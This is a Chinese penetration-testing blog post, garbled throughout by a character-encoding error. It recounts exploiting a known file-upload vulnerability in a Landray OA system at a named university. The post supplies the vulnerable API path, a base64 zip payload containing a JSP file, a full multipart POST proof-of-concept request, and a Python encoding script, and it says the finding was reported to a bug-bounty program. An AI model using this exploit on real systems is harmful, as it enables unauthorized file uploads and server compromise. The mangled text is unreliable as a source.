一.發(fā)現(xiàn)目標(biāo)
今天不小心滲透測(cè)試其它目標(biāo)時(shí)點(diǎn)進(jìn)了北京外國(guó)語大學(xué)的一個(gè)oa登陸界面
看著有點(diǎn)眼熟����,于是去識(shí)別了一下指紋
藍(lán)凌OA,老熟人���,于是我們用一下歷史漏洞打一下這個(gè)站
二.漏洞驗(yàn)證
驗(yàn)證漏洞是否可以利用�,可以訪問該接口
https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
頁面如下
成功訪問
有戲��,那我們接著利用一下
三.漏洞利用
構(gòu)造上傳文件����,guyue.jsp和ui.ini,然后放在同一個(gè)文件夾下打包
然后將壓縮包進(jìn)行base64編碼
UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==
poc如下
POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
-----------------------------260140030128010173621878123124
Content-Disposition: form-data; name="file"; filename="guyue.zip"
Content-Type: application/x-zip-compressed
{{base64dec(UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==)}}
-----------------------------260140030128010173621878123124--
附上編碼腳本
import base64
import zipfile
zip_file_path = "guyue.zip"
with open(zip_file_path, "rb") as file:
zip_content = file.read()
base64_encoded = base64.b64encode(zip_content).decode("utf-8")
print(base64_encoded)
這里我踩了半個(gè)多小時(shí)的坑�,需要直接將兩個(gè)文件進(jìn)行壓縮�����,而不是先壓縮成文件夾���,再進(jìn)行壓縮
成功訪問到我寫入的文件路徑
四.提交src
教育src點(diǎn)到為止�����,不要上傳馬(bushi)
來源:https://mp.weixin.qq.com/s/DorHJncR89z9XvyTwalnFA
該文章在 2024/8/16 15:04:23 編輯過
400 186 1886
